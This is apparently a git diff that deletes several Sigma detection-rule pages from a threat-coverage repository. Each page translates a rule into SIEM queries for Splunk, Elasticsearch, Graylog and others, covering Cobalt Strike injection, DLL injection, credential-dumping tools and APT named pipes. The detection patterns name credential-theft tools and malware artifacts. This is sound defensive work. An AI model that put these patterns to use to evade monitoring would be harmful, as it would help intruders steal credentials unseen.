-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CobaltStrike Process Injection'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"8" AND TargetProcessAddress.keyword:(*0B80 *0C7C *0C88))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="8" (TargetProcessAddress="*0B80" OR TargetProcessAddress="*0C7C" OR TargetProcessAddress="*0C88"))
-```
-
-
-### logpoint
-    
-```
-(event_id="8" TargetProcessAddress IN ["*0B80", "*0C7C", "*0C88"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*8)(?=.*(?:.*.*0B80|.*.*0C7C|.*.*0C88)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_createremotethread_loadlibrary.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_createremotethread_loadlibrary.md
deleted file mode 100644
index ee182e2..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_createremotethread_loadlibrary.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | CreateRemoteThread API and LoadLibrary       |
-|:-------------------------|:------------------|
-| **Description**          | Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/05_defense_evasion/T1055_process_injection/dll_injection_createremotethread_loadlibrary.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/05_defense_evasion/T1055_process_injection/dll_injection_createremotethread_loadlibrary.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: CreateRemoteThread API and LoadLibrary
-id: 052ec6f6-1adc-41e6-907a-f1c813478bee
-description: Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process
-status: experimental
-date: 2019/08/11
-modified: 2019/11/10
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/05_defense_evasion/T1055_process_injection/dll_injection_createremotethread_loadlibrary.md
-tags:
-    - attack.defense_evasion
-    - attack.t1055
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection: 
-        EventID: 8
-        StartModule|endswith: '\kernel32.dll'
-        StartFunction: 'LoadLibraryA'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "8" -and $_.message -match "StartModule.*.*\\kernel32.dll" -and $_.message -match "StartFunction.*LoadLibraryA") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"8" AND winlog.event_data.StartModule.keyword:*\\kernel32.dll AND StartFunction:"LoadLibraryA")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/052ec6f6-1adc-41e6-907a-f1c813478bee <<EOF
-{
-  "metadata": {
-    "title": "CreateRemoteThread API and LoadLibrary",
-    "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1055"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"8\" AND winlog.event_data.StartModule.keyword:*\\\\kernel32.dll AND StartFunction:\"LoadLibraryA\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"8\" AND winlog.event_data.StartModule.keyword:*\\\\kernel32.dll AND StartFunction:\"LoadLibraryA\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CreateRemoteThread API and LoadLibrary'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"8" AND StartModule.keyword:*\\kernel32.dll AND StartFunction:"LoadLibraryA")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="8" StartModule="*\\kernel32.dll" StartFunction="LoadLibraryA")
-```
-
-
-### logpoint
-    
-```
-(event_id="8" StartModule="*\\kernel32.dll" StartFunction="LoadLibraryA")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*8)(?=.*.*\kernel32\.dll)(?=.*LoadLibraryA))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_cred_dump_tools_named_pipes.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_cred_dump_tools_named_pipes.md
deleted file mode 100644
index 8da0316..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_cred_dump_tools_named_pipes.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Cred Dump-Tools Named Pipes       |
-|:-------------------------|:------------------|
-| **Description**          | Detects well-known credential dumping tools execution via specific named pipes |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Legitimate Administrator using tool for password recovery</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, oscd.community |
-| Other Tags           | <ul><li>attack.t1003.002</li><li>attack.t1003.004</li><li>attack.t1003.006</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Cred Dump-Tools Named Pipes
-id: 961d0ba2-3eea-4303-a930-2cf78bbfcc5e
-description: Detects well-known credential dumping tools execution via specific named pipes
-author: Teymur Kheirkhabarov, oscd.community
-date: 2019/11/01
-references:
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.002
-    - attack.t1003.004
-    - attack.t1003.006
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 17
-        PipeName|contains:
-            - '\lsadump'
-            - '\cachedump'
-            - '\wceservicepipe'
-    condition: selection
-falsepositives:
-    - Legitimate Administrator using tool for password recovery
-level: critical
-status: experimental
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "17" -and ($_.message -match "PipeName.*.*\\lsadump.*" -or $_.message -match "PipeName.*.*\\cachedump.*" -or $_.message -match "PipeName.*.*\\wceservicepipe.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"17" AND winlog.event_data.PipeName.keyword:(*\\lsadump* OR *\\cachedump* OR *\\wceservicepipe*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/961d0ba2-3eea-4303-a930-2cf78bbfcc5e <<EOF
-{
-  "metadata": {
-    "title": "Cred Dump-Tools Named Pipes",
-    "description": "Detects well-known credential dumping tools execution via specific named pipes",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.002",
-      "attack.t1003.004",
-      "attack.t1003.006"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"17\" AND winlog.event_data.PipeName.keyword:(*\\\\lsadump* OR *\\\\cachedump* OR *\\\\wceservicepipe*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"17\" AND winlog.event_data.PipeName.keyword:(*\\\\lsadump* OR *\\\\cachedump* OR *\\\\wceservicepipe*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Cred Dump-Tools Named Pipes'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"17" AND PipeName.keyword:(*\\lsadump* *\\cachedump* *\\wceservicepipe*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="17" (PipeName="*\\lsadump*" OR PipeName="*\\cachedump*" OR PipeName="*\\wceservicepipe*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="17" PipeName IN ["*\\lsadump*", "*\\cachedump*", "*\\wceservicepipe*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*17)(?=.*(?:.*.*\lsadump.*|.*.*\cachedump.*|.*.*\wceservicepipe.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_hack_wce.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_hack_wce.md
deleted file mode 100644
index 7495470..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_hack_wce.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Windows Credential Editor       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the use of Windows Credential Editor (WCE) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Another service that uses a single -s command line switch</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.s0005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Windows Credential Editor
-id: 7aa7009a-28b9-4344-8c1f-159489a390df
-description: Detects the use of Windows Credential Editor (WCE)
-author: Florian Roth
-references:
-    - https://www.ampliasecurity.com/research/windows-credentials-editor/
-date: 2019/12/31
-modified: 2020/07/01
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.s0005
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Imphash: 
-          - a53a02b997935fd8eedcb5f7abab9b9f
-          - e96a73c7bf33a464c510ede582318bf2
-    selection2:
-        CommandLine|endswith: '.exe -S'
-        ParentImage|endswith: '\services.exe'
-    condition: 1 of them
-falsepositives:
-    - 'Another service that uses a single -s command line switch'
-level: critical
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "a53a02b997935fd8eedcb5f7abab9b9f" -or $_.message -match "e96a73c7bf33a464c510ede582318bf2") -or ($_.message -match "CommandLine.*.*.exe -S" -and $_.message -match "ParentImage.*.*\\services.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Imphash:("a53a02b997935fd8eedcb5f7abab9b9f" OR "A53A02B997935FD8EEDCB5F7ABAB9B9F" OR "e96a73c7bf33a464c510ede582318bf2" OR "E96A73C7BF33A464C510EDE582318BF2") OR (winlog.event_data.CommandLine.keyword:*.exe\ \-S AND winlog.event_data.ParentImage.keyword:*\\services.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7aa7009a-28b9-4344-8c1f-159489a390df <<EOF
-{
-  "metadata": {
-    "title": "Windows Credential Editor",
-    "description": "Detects the use of Windows Credential Editor (WCE)",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.s0005"
-    ],
-    "query": "(winlog.event_data.Imphash:(\"a53a02b997935fd8eedcb5f7abab9b9f\" OR \"A53A02B997935FD8EEDCB5F7ABAB9B9F\" OR \"e96a73c7bf33a464c510ede582318bf2\" OR \"E96A73C7BF33A464C510EDE582318BF2\") OR (winlog.event_data.CommandLine.keyword:*.exe\\ \\-S AND winlog.event_data.ParentImage.keyword:*\\\\services.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Imphash:(\"a53a02b997935fd8eedcb5f7abab9b9f\" OR \"A53A02B997935FD8EEDCB5F7ABAB9B9F\" OR \"e96a73c7bf33a464c510ede582318bf2\" OR \"E96A73C7BF33A464C510EDE582318BF2\") OR (winlog.event_data.CommandLine.keyword:*.exe\\ \\-S AND winlog.event_data.ParentImage.keyword:*\\\\services.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Windows Credential Editor'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Imphash:("a53a02b997935fd8eedcb5f7abab9b9f" "A53A02B997935FD8EEDCB5F7ABAB9B9F" "e96a73c7bf33a464c510ede582318bf2" "E96A73C7BF33A464C510EDE582318BF2") OR (CommandLine.keyword:*.exe \-S AND ParentImage.keyword:*\\services.exe))
-```
-
-
-### splunk
-    
-```
-((Imphash="a53a02b997935fd8eedcb5f7abab9b9f" OR Imphash="e96a73c7bf33a464c510ede582318bf2") OR (CommandLine="*.exe -S" ParentImage="*\\services.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Imphash IN ["a53a02b997935fd8eedcb5f7abab9b9f", "e96a73c7bf33a464c510ede582318bf2"] OR (CommandLine="*.exe -S" ParentImage="*\\services.exe")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*a53a02b997935fd8eedcb5f7abab9b9f|.*e96a73c7bf33a464c510ede582318bf2)|.*(?:.*(?=.*.*\.exe -S)(?=.*.*\services\.exe))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_logon_scripts_userinitmprlogonscript_proc.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_logon_scripts_userinitmprlogonscript_proc.md
deleted file mode 100644
index d4fc2d4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_logon_scripts_userinitmprlogonscript_proc.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | Logon Scripts (UserInitMprLogonScript)       |
-|:-------------------------|:------------------|
-| **Description**          | Detects creation or execution of UserInitMprLogonScript persistence method |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1037: Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>exclude legitimate logon scripts</li><li>penetration tests, red teaming</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://attack.mitre.org/techniques/T1037/](https://attack.mitre.org/techniques/T1037/)</li></ul>  |
-| **Author**               | Tom Ueltschi (@c_APT_ure) |
-| Other Tags           | <ul><li>attack.t1037.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Logon Scripts (UserInitMprLogonScript)
-id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458
-status: experimental
-description: Detects creation or execution of UserInitMprLogonScript persistence method
-references:
-    - https://attack.mitre.org/techniques/T1037/
-tags:
-    - attack.t1037
-    - attack.t1037.001
-    - attack.persistence
-    - attack.lateral_movement
-author: Tom Ueltschi (@c_APT_ure)
-date: 2019/01/12
-modified: 2020/07/01
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    exec_selection:
-        ParentImage: '*\userinit.exe'
-    exec_exclusion1:
-        Image: '*\explorer.exe'
-    exec_exclusion2:
-        CommandLine|contains:
-            - 'netlogon.bat'
-            - 'UsrLogon.cmd'
-    create_keywords_cli:
-        CommandLine: '*UserInitMprLogonScript*'
-    condition: ( exec_selection and not exec_exclusion1 and not exec_exclusion2 ) or create_keywords_cli
-falsepositives:
-    - exclude legitimate logon scripts
-    - penetration tests, red teaming
-level: high
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\userinit.exe" -and  -not ($_.message -match "Image.*.*\\explorer.exe")) -and  -not (($_.message -match "CommandLine.*.*netlogon.bat.*" -or $_.message -match "CommandLine.*.*UsrLogon.cmd.*"))) -or $_.message -match "CommandLine.*.*UserInitMprLogonScript.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(((winlog.event_data.ParentImage.keyword:*\\userinit.exe AND (NOT (winlog.event_data.Image.keyword:*\\explorer.exe))) AND (NOT (winlog.event_data.CommandLine.keyword:(*netlogon.bat* OR *UsrLogon.cmd*)))) OR winlog.event_data.CommandLine.keyword:*UserInitMprLogonScript*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/0a98a10c-685d-4ab0-bddc-b6bdd1d48458 <<EOF
-{
-  "metadata": {
-    "title": "Logon Scripts (UserInitMprLogonScript)",
-    "description": "Detects creation or execution of UserInitMprLogonScript persistence method",
-    "tags": [
-      "attack.t1037",
-      "attack.t1037.001",
-      "attack.persistence",
-      "attack.lateral_movement"
-    ],
-    "query": "(((winlog.event_data.ParentImage.keyword:*\\\\userinit.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\explorer.exe))) AND (NOT (winlog.event_data.CommandLine.keyword:(*netlogon.bat* OR *UsrLogon.cmd*)))) OR winlog.event_data.CommandLine.keyword:*UserInitMprLogonScript*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(((winlog.event_data.ParentImage.keyword:*\\\\userinit.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\explorer.exe))) AND (NOT (winlog.event_data.CommandLine.keyword:(*netlogon.bat* OR *UsrLogon.cmd*)))) OR winlog.event_data.CommandLine.keyword:*UserInitMprLogonScript*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Logon Scripts (UserInitMprLogonScript)'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(((ParentImage.keyword:*\\userinit.exe AND (NOT (Image.keyword:*\\explorer.exe))) AND (NOT (CommandLine.keyword:(*netlogon.bat* *UsrLogon.cmd*)))) OR CommandLine.keyword:*UserInitMprLogonScript*)
-```
-
-
-### splunk
-    
-```
-(((ParentImage="*\\userinit.exe" NOT (Image="*\\explorer.exe")) NOT ((CommandLine="*netlogon.bat*" OR CommandLine="*UsrLogon.cmd*"))) OR CommandLine="*UserInitMprLogonScript*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((event_id="1" (ParentImage="*\\userinit.exe"  -(Image="*\\explorer.exe"))  -(CommandLine IN ["*netlogon.bat*", "*UsrLogon.cmd*"])) OR CommandLine="*UserInitMprLogonScript*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*(?=.*.*\userinit\.exe)(?=.*(?!.*(?:.*(?=.*.*\explorer\.exe))))))(?=.*(?!.*(?:.*(?=.*(?:.*.*netlogon\.bat.*|.*.*UsrLogon\.cmd.*))))))|.*.*UserInitMprLogonScript.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_mal_namedpipes.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_mal_namedpipes.md
deleted file mode 100644
index 40d0aca..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_mal_namedpipes.md
+++ /dev/null
@@ -1,194 +0,0 @@
-| Title                    | Malicious Named Pipe       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the creation of a named pipe used by known APT malware |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unkown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[Various sources](Various sources)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Malicious Named Pipe
-id: fe3ac066-98bb-432a-b1e7-a5229cb39d4a
-status: experimental
-description: Detects the creation of a named pipe used by known APT malware
-references:
-    - Various sources
-date: 2017/11/06
-author: Florian Roth
-logsource:
-   product: windows
-   service: sysmon
-   definition: 'Note that you have to configure logging for PipeEvents in Symson config'
-detection:
-   selection:
-      EventID: 
-         - 17
-         - 18
-      PipeName: 
-         - '\isapi_http'  # Uroburos Malware Named Pipe
-         - '\isapi_dg'  # Uroburos Malware Named Pipe
-         - '\isapi_dg2'  # Uroburos Malware Named Pipe
-         - '\sdlrpc'  # Cobra Trojan Named Pipe http://goo.gl/8rOZUX
-         - '\ahexec'  # Sofacy group malware
-         - '\winsession'  # Wild Neutron APT malware https://goo.gl/pivRZJ
-         - '\lsassw'  # Wild Neutron APT malware https://goo.gl/pivRZJ
-         - '\46a676ab7f179e511e30dd2dc41bd388'  # Project Sauron https://goo.gl/eFoP4A
-         - '\9f81f59bc58452127884ce513865ed20'  # Project Sauron https://goo.gl/eFoP4A
-         - '\e710f28d59aa529d6792ca6ff0ca1b34'  # Project Sauron https://goo.gl/eFoP4A
-         - '\rpchlp_3'  # Project Sauron https://goo.gl/eFoP4A - Technical Analysis Input
-         - '\NamePipe_MoreWindows'  # Cloud Hopper Annex B https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, US-CERT Alert - RedLeaves https://www.us-cert.gov/ncas/alerts/TA17-117A
-         - '\pcheap_reuse'  # Pipe used by Equation Group malware 77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0
-         - '\msagent_*'  # CS default named pipes https://github.com/Neo23x0/sigma/issues/253
-         - '\gruntsvc' # Covenant default named pipe
-         # - '\status_*'  # CS default named pipes https://github.com/Neo23x0/sigma/issues/253
-   condition: selection
-tags:
-    - attack.defense_evasion
-    - attack.privilege_escalation
-    - attack.t1055
-falsepositives:
-   - Unkown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "17" -or $_.ID -eq "18") -and ($_.message -match "\\isapi_http" -or $_.message -match "\\isapi_dg" -or $_.message -match "\\isapi_dg2" -or $_.message -match "\\sdlrpc" -or $_.message -match "\\ahexec" -or $_.message -match "\\winsession" -or $_.message -match "\\lsassw" -or $_.message -match "\\46a676ab7f179e511e30dd2dc41bd388" -or $_.message -match "\\9f81f59bc58452127884ce513865ed20" -or $_.message -match "\\e710f28d59aa529d6792ca6ff0ca1b34" -or $_.message -match "\\rpchlp_3" -or $_.message -match "\\NamePipe_MoreWindows" -or $_.message -match "\\pcheap_reuse" -or $_.message -match "PipeName.*\\msagent_.*" -or $_.message -match "\\gruntsvc")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
